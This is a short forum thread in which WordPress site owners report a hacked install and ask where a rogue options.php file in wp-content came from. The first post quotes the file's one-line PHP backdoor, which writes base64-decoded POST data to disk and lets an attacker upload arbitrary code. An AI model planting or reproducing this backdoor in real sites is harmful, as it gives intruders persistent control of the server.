Infected File

  • May-Fly

    (@mayflyim)


    11 years ago

    I had one of my sites hacked recently when malicous code was injected in every php file on the install.

    Eventually I found the culprit to be an options.php file I found lurking in the wp-content folder.

    File had the following code:

    <?phpif (isset($_POST['da'])) {file_put_contents('options.php', base64_decode($_POST['da']), LOCK_EX);}?>

    Has anyone else come across this file?

    Any ideas where it came from?

Viewing 1 replies (of 1 total)
  • WP_Sites

    (@wp_sites)

    10 years, 7 months ago

    I have a similar problem. Not only did I find an options.php in the wp-content folder, there was one in the wp-content\themes folder too.

    Both had the code mentioned above.

    Did deleting the options.php file do the trick or did you have to do anything else?

Viewing 1 replies (of 1 total)

The topic ‘Infected File’ is closed to new replies.